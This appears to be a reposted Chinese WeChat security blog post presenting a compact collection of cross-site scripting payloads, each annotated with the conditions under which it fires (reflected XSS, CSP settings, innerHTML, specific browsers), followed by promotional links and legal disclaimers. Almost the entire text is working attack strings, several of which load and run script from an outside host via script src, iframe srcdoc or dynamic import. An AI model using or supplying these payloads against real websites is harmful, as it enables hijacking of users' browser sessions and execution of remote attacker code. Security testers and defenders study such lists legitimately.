XSS-Payloads
<!-- 仅适用于反射型XSS --!>
<svg/onload=eval(name)>
<!-- 如果你控制了 URL -->
<svg/onload=eval(`'`+URL)>
<!-- 如果你控制了名字,但是 unsafe-eval 没有启用 -->
<svg/onload=location=name>
<!-- 在 chrome 中,也适用于 innerHTML,即使在尚未插入 DOM 的元素上 -->
<svg><svg/onload=eval(name)>
<!-- 如果您控制窗口的名称,此有效负载将在innerHTML 内工作,即使在尚未插入DOM 的元素上-->
<audio/src/onerror=eval(name)>
<!-- 如果您控制 URL,此有效负载将在 innerHTML 内工作,即使在尚未插入 DOM 的元素上 -->
<img/src/onerror=eval(`'`+URL)>
<!-- 随便一个脚本 -->
<script/src=//NJ.₨></script>
<!-- 如果你控制了窗口的名字 -->
<iframe/onload=src=top.name>
<!-- 如果你控制了 URL -->
<iframe/onload=eval(`'`+URL)>
<!-- 如果页面上的 iframe 数量不变 -->
<iframe/onload=src=top[0].name+/NJ.₨?/>
<!-- 仅适用于 Firefox -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- 如果页面上的 iframe 数量是随机的 -->
<iframe/onload=src=contentWindow.name+/NJ.₨?/>
<!-- 如果在 CSP 中禁用 unsafe-inline 并且允许外部脚本 -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- 如果允许内联样式 -->
<style/onload=eval(name)>
<!-- 如果允许内联样式并且可以控制 URL -->
<style/onload=eval(`'`+URL)>
<!-- 如果内联样式被阻止 -->
<style/onerror=eval(name)>
<!-- 使用外部脚本作为导入,在innerHTML 中不起作用,除非Firefox -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<svg/onload=import(/\NJ.₨/)>
<!-- 使用外部脚本作为导入,如果允许内联样式则触发。
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<style/onload=import(/\NJ.₨/)>
<!-- 使用外部脚本作为导入 -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<iframe/onload=import(/\NJ.₨/)>
弃用:
<!-- 如果你控制了网址,Safari-only -->
<iframe/onload=write(URL)>
<!-- 如果允许内联样式,仅 Safari -->
<style/onload=write(URL)>
演示:
Payloads获取
关注微信公众号雾晓安全后台回复“ XSS-Payloads ”获取下载链接
网络安全攻防WiKi
ID:61345404
欢迎各位师傅通过微信扫描加入网络安全攻防WiKi,本星球宗旨以免费共享发展为前提,主要以网络安全攻防技术共享交流,覆盖网络安全资料,以及岗位内推。
免责声明
内容来源网络,版权归原创者所有,禁止使用本项目的任何形式进行发起网络攻击,阻止一切网络犯罪行为,一切信息禁止用于任何非法用途。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并致歉。谢谢!
觉得不错点个“赞”、“在看”,支持下小编
本文始发于微信公众号(雾晓安全):微小的XSS Payloads集合
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论